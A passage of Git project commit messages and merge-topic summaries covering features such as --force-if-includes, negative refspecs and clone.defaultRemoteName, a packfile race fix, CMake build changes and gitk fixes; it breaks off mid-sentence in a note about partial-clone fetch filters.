gitk: rename "commit summary" to "commit reference"
in_merge_bases_many(), a way to see if a commit is reachable from
any commit in a set of commits, was totally broken when the
commit-graph feature was in use, which has been corrected.
* ds/in-merge-bases-many-optim-bug:
commit-reach: fix in_merge_bases_many bug
`git ls-files` was never taught to respect the `submodule.recurse`
configuration variable, and it is too late now to change that [1],
but still the command is mentioned in 'gitsubmodules(7)' as if it
does respect that config.
Adjust the call in 'gitsubmodules(7)' by calling 'ls-files' with the
'--recurse-submodules' option.
While at it, uniformize the capitalization in that file, and use
backticks instead of quotes for Git commands and configuration
variables.
[1] https://lore.kernel.org/git/pull.732.git.1599707259907.gitgitgadget@gmail.com/T/#u
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A race that leads to an access to a free'd data was corrected in
the codepath that reads pack files.
* mt/delta-base-cache-races:
packfile: fix memory leak in add_delta_base_cache()
packfile: fix race condition on unpack_entry()
"git shortlog" has been taught to group commits by the contents of
the trailer lines, like "Reviewed-by:", "Coauthored-by:", etc.
* jk/shortlog-group-by-trailer:
shortlog: allow multiple groups to be specified
shortlog: parse trailer idents
shortlog: rename parse_stdin_ident()
shortlog: de-duplicate trailer values
shortlog: match commit trailers with --group
trailer: add interface for iterating over commit trailers
shortlog: add grouping option
shortlog: change "author" variables to "ident"
The command line completion (in contrib/) learned that "git restore
-s <TAB>" is often followed by a refname.
* au/complete-restore-s:
completion: complete refs after 'git restore -s'
completion: use "prev" variable instead of introducing "prevword"
Rewrite of the "git bisect" script in C continues.
* mr/bisect-in-c-2:
bisect--helper: reimplement `bisect_next` and `bisect_auto_next` shell functions in C
bisect: call 'clear_commit_marks_all()' in 'bisect_next_all()'
bisect--helper: reimplement `bisect_autostart` shell function in C
bisect--helper: introduce new `write_in_file()` function
bisect--helper: use '-res' in 'cmd_bisect__helper' return
bisect--helper: BUG() in cmd_*() on invalid subcommand
"git bisect start X Y", when X and Y are not valid committish
object names, should take X and Y as pathspec, but didn't.
* cc/bisect-start-fix:
bisect: don't use invalid oid as rev when starting
"git blame --ignore-rev/--ignore-revs-file" failed to validate
their input are valid revision, and failed to take into account
that the user may want to give an annotated tag instead of a
commit, which has been corrected.
* jc/blame-ignore-fix:
blame: validate and peel the object names on the ignore list
t8013: minimum preparatory clean-up
Compilation fix around type punning.
* jk/drop-unaligned-loads:
Revert "fast-export: use local array to store anonymized oid"
bswap.h: drop unaligned loads
The installation procedure learned to optionally omit "git-foo"
executable files for each 'foo' built-in subcommand, which are only
required by old timers that still rely on the age old promise that
prepending "git --exec-path" output to PATH early in their script
will keep the "git-foo" calls they wrote working.
The old attempt to remove these executables from the disk failed in
the 1.6 era; it may be worth attempting again, but I think it is
worth to keep this topic separate from such a policy change to help
it graduate early.
* js/no-builtins-on-disk-option:
ci: stop linking built-ins to the dashed versions
Optionally skip linking/copying the built-ins
msvc: copy the correct `.pdb` files in the Makefile target `install`
Modernization and fixes to MediaWiki remote backend.
* ab/mediawiki-fixes:
remote-mediawiki: use "sh" to eliminate unquoted commands
remote-mediawiki: annotate unquoted uses of run_git()
remote-mediawiki: convert to quoted run_git() invocation
remote-mediawiki: provide a list form of run_git()
remote-mediawiki tests: annotate failing tests
remote-mediawiki: fix duplicate revisions being imported
remote-mediawiki tests: use CLI installer
remote-mediawiki tests: use inline PerlIO for readability
remote-mediawiki tests: replace deprecated Perl construct
remote-mediawiki tests: use a more idiomatic dispatch table
remote-mediawiki tests: use "$dir/" instead of "$dir."
remote-mediawiki tests: change `[]` to `test`
remote-mediawiki tests: use test_cmp in tests
remote-mediawiki tests: use a 10 character password
remote-mediawiki tests: use the login/password variables
remote-mediawiki doc: don't hardcode Debian PHP versions
remote-mediawiki doc: link to MediaWiki's current version
remote-mediawiki doc: correct link to GitHub project
This fix makes using Git credentials more friendly to Windows users: it
allows a credential helper to communicate using CR/LF line endings ("DOS
line endings" commonly found on Windows) instead of LF-only line endings
("Unix line endings").
Note that this changes the behavior a bit: if a credential helper
produces, say, a password with a trailing Carriage Return character,
that will now be culled even when the rest of the lines end only in Line
Feed characters, indicating that the Carriage Return was not meant to be
part of the line ending.
In practice, it seems _very_ unlikely that something like this happens.
Passwords usually need to consist of non-control characters, URLs need
to have special characters URL-encoded, and user names, well, are names.
However, it _does_ help on Windows, where CR/LF line endings are common:
as unrecognized commands are simply ignored by the credential machinery,
even a command like `quit\r` (which is clearly intended to abort) would
simply be ignored (silently) by Git.
So let's change the credential machinery to accept both CR/LF and LF
line endings.
While we do this for the credential helper protocol, we do _not_ adjust
`git credential-cache--daemon` (which won't work on Windows, anyway,
because it requires Unix sockets) nor `git credential-store` (which
writes the file `~/.git-credentials` which we consider an implementation
detail that should be opaque to the user, read: we do expect users _not_
to edit this file manually).
Signed-off-by: Nikita Leonov <nykyta.leonov@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
* paulus/master:
gitk: Resize panes correctly when reducing window size
gitk: replace tabs with spaces
gitk: fix the context menu not appearing in the presence of submodule diffs
gitk: Un-hide selection in areas with non-default background color
gitk: add diff lines background colors
gitk: be prepared to be run in a bare repository
gitk: Preserve window dimensions on exit when not using ttk themes
gitk: don't highlight files after submodules as submodules
gitk: fix branch name encoding error
gitk: rename "commit summary" to "commit reference"
Update test cases for the new option, and document its usage
and update related references.
Update test cases for the new option, and document its usage
and update related references.
- t/t5533-push-cas.sh:
Update test cases for "compare-and-swap" when used along with
"--force-if-includes" helps mitigate overwrites when remote
refs are updated in the background; allows forced updates when
changes from remote are integrated locally.
- Documentation:
Add reference for the new option, configuration setting
("push.useForceIfIncludes") and advise messages.
Signed-off-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit added the necessary machinery to implement the
"--force-if-includes" protection, when "--force-with-lease" is used
without giving exact object the remote still ought to have. Surface
the feature by adding a command line option and a configuration
variable to enable it.
- Add a flag: "TRANSPORT_PUSH_FORCE_IF_INCLUDES" to indicate that the
new option was passed from the command line of via configuration
settings; update command line and configuration parsers to set the
new flag accordingly.
- Introduce a new configuration option "push.useForceIfIncludes", which
is equivalent to setting "--force-if-includes" in the command line.
- Update "remote-curl" to recognize and pass this option to "send-pack"
when enabled.
- Update "advise" to catch the reject reason "REJECT_REF_NEEDS_UPDATE",
set when the ref status is "REF_STATUS_REJECT_REMOTE_UPDATED" and
(optionally) print a help message when the push fails.
- The new option is a "no-op" in the following scenarios:
* When used without "--force-with-lease".
* When used with "--force-with-lease", and if the expected commit
on the remote side is specified as an argument.
Signed-off-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a check to verify if the remote-tracking ref of the local branch
is reachable from one of its "reflog" entries.
The check iterates through the local ref's reflog to see if there
is an entry for the remote-tracking ref and collecting any commits
that are seen, into a list; the iteration stops if an entry in the
reflog matches the remote ref or if the entry timestamp is older
the latest entry of the remote ref's "reflog". If there wasn't an
entry found for the remote ref, "in_merge_bases_many()" is called
to check if it is reachable from the list of collected commits.
When a local branch that is based on a remote ref, has been rewound
and is to be force pushed on the remote, "--force-if-includes" runs
a check that ensures any updates to the remote-tracking ref that may
have happened (by push from another repository) in-between the time
of the last update to the local branch (via "git-pull", for instance)
and right before the time of push, have been integrated locally
before allowing a forced update.
If the new option is passed without specifying "--force-with-lease",
or specified along with "--force-with-lease=<refname>:<expect>" it
is a "no-op".
Signed-off-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The resizeclistpanes and resizecdetpanes procedures attempt to keep
the horizontal proportions of the panes of the gitk window
approximately constant when the gitk window is resized. However, if
the size is reduced enough that an existing sash position would go
outside the window, Tk moves the sash to the left to keep it inside
the window (without moving other sash positions to keep the
proportions). This happens before these resize procedures get
control, and so they work with incorrect proportions.
To fix this, we record the sash positions we set previously and use
those previously-set sash positions rather than the current sash
positions when computing the proportions.
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
The source code is a mix of tabs and spaces. The indentation style
currently is four spaces per indent level but uses tabs every other
level (at eight spaces). Fix this inconsistent spacing and tabbing by
just using a space-indent for everything.
This was done mechanically by running:
$ expand -i gitk >gitk.new
$ mv gitk.new gitk
This patch should be empty with `--ignore-all-space`.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Paul Mackerras <paulus@ozlabs.org>
Way back in f9b8908b (commit.c: use generation numbers for
in_merge_bases(), 2018-05-01), a heuristic was used to short-circuit
the in_merge_bases() walk. This works just fine as long as the
caller is checking only two commits, but when there are multiple,
there is a possibility that this heuristic is _very wrong_.
Some code moves since then has changed this method to
repo_in_merge_bases_many() inside commit-reach.c. The heuristic
computes the minimum generation number of the "reference" list, then
compares this number to the generation number of the "commit".
In a recent topic, a test was added that used in_merge_bases_many()
to test if a commit was reachable from a number of commits pulled
from a reflog. However, this highlighted the problem: if any of the
reference commits have a smaller generation number than the given
commit, then the walk is skipped _even if there exist some with
higher generation number_.
This heuristic is wrong! It must check the MAXIMUM generation number
of the reference commits, not the MINIMUM.
This highlights a testing gap. t6600-test-reach.sh covers many
methods in commit-reach.c, including in_merge_bases() and
get_merge_bases_many(), but since these methods either restrict to
two input commits or actually look for the full list of merge bases,
they don't check this heuristic!
Add a possible input to "test-tool reach" that tests
in_merge_bases_many() and add tests to t6600-test-reach.sh that
cover this heuristic. This includes cases for the reference commits
having generation above and below the generation of the input commit,
but also having maximum generation below the generation of the input
commit.
The fix itself is to swap min_generation with a max_generation in
repo_in_merge_bases_many().
Reported-by: Srinidhi Kaushik <shrinidhi.kaushik@gmail.com>
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The format.useAutoBase configuration option exists to allow users to
enable '--base=auto' for format-patch by default.
This can sometimes lead to poor workflow, due to unexpected failures
when attempting to format an ancient patch:
$ git format-patch -1 <an old commit>
fatal: base commit shouldn't be in revision list
This can be very confusing, as it is not necessarily immediately obvious
that the user requested a --base (since this was in the configuration,
not on the command line).
We do want --base=auto to fail when it cannot provide a suitable base,
as it would be equally confusing if a formatted patch did not include
the base information when it was requested.
Teach format.useAutoBase a new mode, "whenAble". This mode will cause
format-patch to attempt to include a base commit when it can. However,
if no valid base commit can be found, then format-patch will continue
formatting the patch without a base commit.
In order to avoid making yet another branch name unusable with --base,
do not teach --base=whenAble or --base=whenable.
Instead, refactor the base_commit option to use a callback, and rely on
the global configuration variable auto_base.
This does mean that a user cannot request this optional base commit
generation from the command line. However, this is likely not too
valuable. If the user requests base information manually, they will be
immediately informed of the failure to acquire a suitable base commit.
This allows the user to make an informed choice about whether to
continue the format.
Add tests to cover the new mode of operation for --base.
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commands such as
$ git pull --rebase --recurse-submodules --quiet
produce non-quiet output from the merge or rebase. Pass the --quiet
option down when invoking "rebase" and "merge".
Also fix the parsing of git submodule update -v.
When e84c3cf3 (git-submodule.sh: accept verbose flag in cmd_update
to be non-quiet, 2018-08-14) taught "git submodule update" to take
"--quiet", it apparently did not know how ${GIT_QUIET:+--quiet}
works, and reviewers seem to have missed that setting the variable
to "0", rather than unsetting it, still results in "--quiet" being
passed to underlying commands.
Signed-off-by: Theodore Dubois <tbodt@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While the default remote name of "origin" can be changed at clone-time
with `git clone`'s `--origin` option, it was previously not possible
to specify a default value for the name of that remote. Add support for
a new `clone.defaultRemoteName` config, with the newly-created remote
name resolved in priority order:
1. (Highest priority) A remote name passed directly to `git clone -o`
2. A `clone.defaultRemoteName=new_name` in config `git clone -c`
3. A `clone.defaultRemoteName` value set in `/path/to/template/config`,
where `--template=/path/to/template` is provided
4. A `clone.defaultRemoteName` value set in a non-template config file
5. The default value of `origin`
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Helped-by: Derrick Stolee <stolee@gmail.com>
Helped-by: Andrei Rybak <rybak.a.v@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future patch, the name of the remote created by `git clone` may
come from multiple sources. To avoid confusion, convert most uses of
option_origin to remote_name, leaving option_origin to exclusively
represent the -o/--origin option.
Helped-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Providing a bad origin name to `git clone` currently reports an
'invalid refspec' error instead of a more explicit message explaining
that the `--origin` option was malformed. This behavior dates back to
since 8434c2f1 (Build in clone, 2008-04-27). Reintroduce
validation for the provided `--origin` option, but notably _don't_
include a multi-level check (e.g. "foo/bar") that was present in the
original `git-clone.sh`. `git remote` allows multi-level remote names
since at least 46220ca100 (remote.c: Fix overtight refspec validation,
2008-03-20), so that appears to be the desired behavior.
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Derrick Stolee <stolee@gmail.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a future patch, extract from remote.c a function that
validates possible remote names so that its rules can be used
consistently in other places.
Helped-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a future patch that moves `builtin/remote.c`'s
remote-name validation, ensure `git remote add` and `git remote rename`
report errors when the new name isn't valid.
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Parsing command-line options before reading from config required careful
handling to ensure CLI options were treated with higher priority. Read
config first to let parsed CLI naively overwrite matching config values.
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both fetch and push support pattern refspecs which allow fetching or
pushing references that match a specific pattern. Because these patterns
are globs, they have somewhat limited ability to express more complex
situations.
For example, suppose you wish to fetch all branches from a remote except
for a specific one. To allow this, you must setup a set of refspecs
which match only the branches you want. Because refspecs are either
explicit name matches, or simple globs, many patterns cannot be
expressed.
Add support for a new type of refspec, referred to as "negative"
refspecs. These are prefixed with a '^' and mean "exclude any ref
matching this refspec". They can only have one "side" which always
refers to the source. During a fetch, this refers to the name of the ref
on the remote. During a push, this refers to the name of the ref on the
local side.
With negative refspecs, users can express more complex patterns. For
example:
git fetch origin refs/heads/*:refs/remotes/origin/* ^refs/heads/dontwant
will fetch all branches on origin into remotes/origin, but will exclude
fetching the branch named dontwant.
Refspecs today are commutative, meaning that order doesn't expressly
matter. Rather than forcing an implied order, negative refspecs will
always be applied last. That is, in order to match, a ref must match at
least one positive refspec, and match none of the negative refspecs.
This is similar to how negative pathspecs work.
Signed-off-by: Jacob Keller <jacob.keller@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When doing combined diffs, we have two possible code paths:
- a slower one which independently diffs against each parent, applies
any filters, and then intersects the resulting paths
- a faster one which walks all trees simultaneously
When the diff options specify that we must do certain filters, like
pickaxe, then we always use the slow path, since the pickaxe code only
knows how to handle filepairs, not the n-parent entries generated for
combined diffs.
But there are two problems with the slow path:
1. It's slow. Running:
git rev-list HEAD | git diff-tree --stdin -r -c
in git.git takes ~3s on my machine. But adding "--find-object" to
that increases it to ~6s, even though find-object itself should
incur only a few extra oid comparisons. On linux.git, it's even
worse: 35s versus 215s.
2. It doesn't catch all cases where a particular path is interesting.
Consider a merge with parent blobs X and Y for a particular path,
and end result Z. That should be interesting according to "-c",
because the result doesn't match either parent. And it should be
interesting even with "--find-object=X", because "X" went away in
the merge.
But because we perform each pairwise diff independently, this
confuses the intersection code. The change from X to Z is still
interesting according to --find-object. But in the other parent we
went from Y to Z, so the diff appears empty! That causes the
intersection code to think that parent didn't change the path, and
thus it's not interesting for "-c".
This patch fixes both by implementing --find-object for the multitree
code. It's a bit unfortunate that we have to duplicate some logic from
diffcore-pickaxe, but this is the best we can do for now. In an ideal
world, all of the diffcore code would stop thinking about filepairs and
start thinking about n-parent sets, and we could use the multitree walk
with all of it.
Until then, there are some leftover warts:
- other pickaxe operations, like -S or -G, still suffer from both
problems. These would be hard to adapt because they rely on having
a diff_filespec() for each path to look at content. And we'd need to
define what an n-way "change" means in each case (probably easy for
"-S", which can compare counts, but not so clear for -G, which is
about grepping diffs).
- other options besides --find-object may cause us to use the slow
pairwise path, in which case we'll go back to producing a different
(wrong) answer for the X/Y/Z case above.
We may be able to hack around these, but I think the ultimate solution
will be a larger rewrite of the diffcore code. For now, this patch
improves one specific case but leaves the rest.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The OFFSETOF_VAR(var, member) macro is implemented in terms of
offsetof(typeof(*var), member) with compilers that know typeof(),
but its fallback implemenation compares &(var->member) and (var) and
count the distance in bytes, i.e.
((uintptr_t)&(var)->member - (uintptr_t)(var))
MSVC's runtime check, when fed an uninitialized 'var', flags this as
a use of an uninitialized variable (and that is legit---uninitialized
contents of 'var' is subtracted) in a debug build.
After auditing all 6 uses of OFFSETOF_VAR(), 1 of them does feed a
potentially uninitialized 'var' to the macro in the beginning of the
for() loop:
#define hashmap_for_each_entry(map, iter, var, member) \
for (var = hashmap_iter_first_entry_offset(map, iter, \
OFFSETOF_VAR(var, member)); \
var; \
var = hashmap_iter_next_entry_offset(iter, \
OFFSETOF_VAR(var, member)))
We can work around this by making sure that var has _some_ value
when OFFSETOF_VAR() is called. Strictly speaking, it invites
undefined behaviour to use NULL here if we end up with pointer
comparison, but MSVC runtime seems to be happy with it, and most
other systems have typeof() and don't even need pointer comparison
fallback code.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It is a lot more convenient to use than having to specify the
configuration in CMake manually (does not matter whether using the
command-line or CMake's GUI).
While at it, recommend using `contrib/buildsystems/out/` as build
directory also in the part that talks about running CMake manually.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The idea of having CMake support in Git's source tree is to enable
contributors on Windows to start contributing with little effort. To
that end, we just added some sensible defaults that will let users open
the worktree in Visual Studio and start building.
This expects the dependencies (such as zlib) to be available already,
though. If they are not available, we expect the user to run
`compat/vcbuild/vcpkg_install.bat`.
Rather than requiring this step to be manual, detect the situation and
run it as part of the CMake configuration step.
Note that this obviously only applies to the scenario when we want to
compile in Visual Studio (i.e. with MS Visual C), not with GCC.
Therefore, we guard this new code block behind the `MSVC` conditional.
This concludes our journey to make it as effortless as possible to start
developing Git in Visual Studio: all the developer needs to do is to
clone Git's repository, open the worktree via `File>Open>Folder...` and
wait for CMake to finish configuring.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have some custom handling regarding the link options, which are
specific to each compiler.
Therefore: let's not just continue without setting the link options if
configuring for a currently unhandled compiler, but error out.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Contrary to Unix-ish platforms, the dependencies' shared libraries are
not usually found in one central place. In our case, since we use
`vcpkg`, they are to be found inside the `compat/vcbuild/vcpkg/` tree.
Let's make sure that they are in the search path when running the tests.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, the build directory will be called something like
`contrib/buildsystems/out/build/x64-Debug (default)` (note the space and
the parentheses). We need to make sure that such a path is quoted
properly when editing the assignment of the `GIT_BUILD_DIR` variable.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are already relying on `vcpkg` to manage our dependencies, including
`libiconv`. Let's also use the `msgfmt.exe` from there.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We don't use the untracked_cache_dir parameter that is passed in, but
instead look at the untracked_cache_dir inside the cached_dir struct we
are passed. It's been this way since the introduction of
treat_path_fast() in 91a2288b5f (untracked cache: record/validate dir
mtime and reuse cached output, 2015-03-08).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The append_signoff() function takes an "ignore_footer"
argument, which specifies a number of bytes at the end of
the message buffer which should not be considered (they
cannot contain trailers, and the trailer is spliced in
before them).
But to find the existing trailers, it calls into
has_conforming_trailer(). That function takes an
ignore_footer parameter, but since 967dfd4d56 (sequencer:
use trailer's trailer layout, 2016-11-02) the parameter is
completely ignored.
The trailer interface we're using takes a single string,
with no option to tell it to use part of the string.
However, since we have a mutable strbuf, we can work around
this by simply overwriting (and later restoring) the
boundary with a NUL.
I'm not sure if this can actually trigger a bug in practice.
It's easy to get a non-zero ignore_footer by doing something
like this:
git commit -F - --cleanup=verbatim <<-EOF
subject
body
Signed-off-by: me
# this looks like a comment, but is actually in the
# message! That makes the earlier s-o-b fake.
EOF
git commit --amend -s
There git-commit calls ignore_non_trailer() to count up the
"#" cruft, which becomes the ignore_footer header. But it
works even without this patch! That's because the trailer
code _also_ calls ignore_non_trailer() and skips the cruft,
too. So it happens to work because the only callers with a
non-zero ignore_footer are using the exact same function
that the trailer parser uses internally.
And that seems true for all of the current callers, but
there's nothing guaranteeing it. We're better off only
feeding the correct buffer to the trailer code in the first
place.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We complain if "test-tool advise" is not given an argument, but we
quietly ignore any additional arguments it receives. Let's instead check
that we got the expected number. As a bonus, this silences
-Wunused-parameter, which notes that we don't ever look at argc.
While we're here, we can also fix the indentation in the conditional.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The sparse-checkout passes along argv and argc to its sub-command helper
functions. Many of these sub-commands do not yet take any command-line
options, and ignore those parameters.
Let's instead add empty option lists and make sure we call
parse_options(). That will give a useful error message for something
like:
git sparse-checkout list --nonsense
which currently just silently ignores the unknown option.
As a bonus, it also silences some -Wunused-parameter warnings.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we switched to using an external git-commit call in b0a3186140
(sequencer: simplify root commit creation, 2019-08-19), this function
didn't need to care about the repository object any more.
Arguably we could be passing along the repository path to the external
git-commit by using "--git-dir=r->path" here. But for the most part the
sequencer code relies on sub-process finding the same repository we're
already in (using the same environment variables or discovery process we
did). But we don't have a convenient interface for doing so, and there's
no indication that we need to. Let's just drop the unused parameter for
now.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We stopped using the "repo" argument in 8e4c8af058 (push: disallow --all
and refspecs when remote.<name>.mirror is set, 2019-09-02), which moved
the pushremote handling to its caller.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the spirit of 517fe807d6 (assert NOARG/NONEG behavior of
parse-options callbacks, 2018-11-05), let's cover some parse-options
callbacks which expect to be used with PARSE_OPT_NONEG but don't
explicitly assert that this is the case. These callbacks are all used
correctly in the current code, but this will help document their
expectations and future-proof the code.
As a bonus, it also silences -Wunused-parameters (these were added since
the initial sweep of 517fe807d6, and we can't yet turn on
-Wunused-parameters to remind people because it has too many existing
false positives).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We use OPT_CALLBACK_F() to call the option_parse_type() callback,
passing it the address of "cmdmode" as the value to write to. But the
callback doesn't look at opt->value at all, and instead writes to a
global variable.
This works out because that's the same global variable we happen to pass
in, but it's rather confusing. Let's use the passed-in value instead.
We'll also make "cmdmode" a local variable of the main function,
ensuring we can't make the same mistake again.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Many functions take an argv/argc pair, but never actually look at argc.
This makes it useless at best (we use the NULL sentinel in argv to find
the end of the array), and misleading at worst (what happens if the argc
count does not match the argv NULL?).
In each of these instances, the argv NULL does match the argc count, so
there are no bugs here. But let's tighten the interfaces to make it
harder to get wrong (and to reduce some -Wunused-parameter complaints).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The crlf_action parameter hasn't been used since a0ad53c181 (convert:
Correct NNO tests and missing `LF will be replaced by CRLF`,
2016-08-13), where that part of the function was hoisted out to a
separate will_convert_lf_to_crlf() helper. Let's drop the useless
parameter.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Earlier we taught "git pull" to warn when the user does not say the
histories need to be merged, rebased or accepts only fast-
forwarding, but the warning triggered for those who have set the
pull.ff configuration variable.
* ah/pull:
pull: don't warn if pull.ff has been set
"git range-diff" showed incorrect diffstat, which has been
corrected.
* tg/range-diff-same-file-fix:
diff: fix modified lines stats with --stat and --numstat
Adjust sample hooks for hash algorithm other than SHA-1.
* dl/zero-oid-in-hooks:
hooks--update.sample: use hash-agnostic zero OID
hooks--pre-push.sample: use hash-agnostic zero OID
hooks--pre-push.sample: modernize script
"git clone" that clones from SHA-1 repository, while
GIT_DEFAULT_HASH set to use SHA-256 already, resulted in an
unusable repository that half-claims to be SHA-256 repository
with SHA-1 objects and refs. This has been corrected.
* bc/clone-with-git-default-hash-fix:
builtin/clone: avoid failure with GIT_DEFAULT_HASH
"git commit-graph write" learned to limit the number of bloom
filters that are computed from scratch with the --max-new-filters
option.
* tb/bloom-improvements:
commit-graph: introduce 'commitGraph.maxNewFilters'
builtin/commit-graph.c: introduce '--max-new-filters=<n>'
commit-graph: rename 'split_commit_graph_opts'
bloom: encode out-of-bounds filters as non-empty
bloom/diff: properly short-circuit on max_changes
bloom: use provided 'struct bloom_filter_settings'
bloom: split 'get_bloom_filter()' in two
commit-graph.c: store maximum changed paths
commit-graph: respect 'commitGraph.readChangedPaths'
t/helper/test-read-graph.c: prepare repo settings
commit-graph: pass a 'struct repository *' in more places
t4216: use an '&&'-chain
commit-graph: introduce 'get_bloom_filter_settings()'
More FAQ entries.
* bc/faq-misc:
docs: explain how to deal with files that are always modified
docs: explain why reverts are not always applied on merge
docs: explain why squash merges are broken with long-running branches
Some combinations of command-line options to `git clone` are invalid,
but there were previously no tests ensuring those combinations reported
errors. Similarly, `git clone --template` didn't appear to have any
tests.
Helped-by: Jeff King <peff@peff.net>
Helped-by: Derrick Stolee <stolee@gmail.com>
Signed-off-by: Sean Barag <sean@barag.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Get rid of 'dense' argument that is redundant for every function that has
'struct rev_info *rev' argument as well, as the value of 'dense' passed is
always taken from 'rev->dense_combined_merges' field.
The only place where this was not the case is in 'submodule.c' where
'diff_tree_combined_merge()' was called with '1' for 'dense' argument. However,
at that call the 'revs' instance used is local to the function, and we now just
set 'revs->dense_combined_merges' to 1 in this local instance.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When add_delta_base_cache() is called with a base that is already in the
cache, no operation is performed. But the check is done after allocating
space for a new entry, so we end up leaking memory on the early return.
In addition, the caller never free()'s the base as it expects the
function to take ownership of it. But the base is not released when we
skip insertion, so it also gets leaked. To fix these problems, move the
allocation of a new entry further down in add_delta_base_cache(), and
free() the base on early return.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The third phase of unpack_entry() performs the following sequence in a
loop, until all the deltas enumerated in phase one are applied and the
entry is fully reconstructed:
1. Add the current base entry to the delta base cache
2. Unpack the next delta
3. Patch the unpacked delta on top of the base
When the optional object reading lock is enabled, the above steps will
be performed while holding the lock. However, step 2. momentarily
releases it so that inflation can be performed in parallel for increased
performance. Because the `base` buffer inserted in the cache at 1. is
not duplicated, another thread can potentially free() it while the lock
is released at 2. (e.g. when there is no space left in the cache to
insert another entry). In this case, the later attempt to dereference
`base` at 3. will cause a segmentation fault. This problem was observed
during a multithreaded git-grep execution on a repository with large
objects.
To fix the race condition (and later segmentation fault), let's reorder
the aforementioned steps so that `base` is only added to the cache at
the end. This will prevent the buffer from being released by another
thread while it is still in use. An alternative solution which would not
require the reordering would be to duplicate `base` before inserting it
in the cache. However, as Phil Hord mentioned, memcpy()'ing large bases
can negatively affect performance: in his experiments, this alternative
approach slowed git-grep down by 10% to 20%.
Reported-by: Phil Hord <phil.hord@gmail.com>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When a fetch with the --filter argument is made, the configured default
filter is set even if one already exists. This change was made in
5e46139376 ("builtin/fetch: remove unique promisor remote limitation",
2019-06-25) - in particular, changing from:
* If this is the FIRST partial-fetch request, we enable partial
* on this repo and remember the given filter-spec as the default
* for subsequent fetches to this remote.
to:
* If this is a partial-fetch request, we enable partial on
* this repo if not already enabled and remember the given
* filter-spec as the default for subsequent fetches to this
* remote.
(The given filter-spec is "remembered" even if there is already an
existing one.)
This is problematic whenever a lazy fetch is made, because lazy fetches
are made using "git fetch --filter=blob:none", but this will also happen
